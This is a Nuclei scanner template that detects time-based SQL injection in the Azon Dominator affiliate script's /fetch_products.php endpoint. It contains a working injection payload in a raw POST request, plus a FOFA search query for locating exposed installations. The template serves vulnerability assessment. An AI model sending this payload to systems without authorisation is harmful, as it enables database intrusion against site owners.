id: azon-dominator-sqli

info:
  name: Azon Dominator - SQL Injection
  author: securityforeveryone
  severity: high
  description: |
    Azon Dominator software is vulnerable to a sql attack at /fetch_products.php.
  reference:
    - https://www.exploit-db.com/exploits/52059
    - https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
  metadata:
    verified: true
    max-request: 1
    fofa-query: "Azon Dominator"
  tags: time-based-sqli,azon,dominator,sqli

http:
  - raw:
      - |
        @timeout 20s
        POST /fetch_products.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code==500'
          - 'contains_all(body, "id", "name", "save_lists.php")'
        condition: and
# digest: 4a0a00473045022100e2cef729fa0c0cb30a2272a53876a0ebdcfe874005a2c4d2a04b0da075d19b0202202b3dc6fd74574d2864ed178818932e49b51a7aba4b02c36b257a29289515f23e:922c64590222798bb761d5b6d8e72950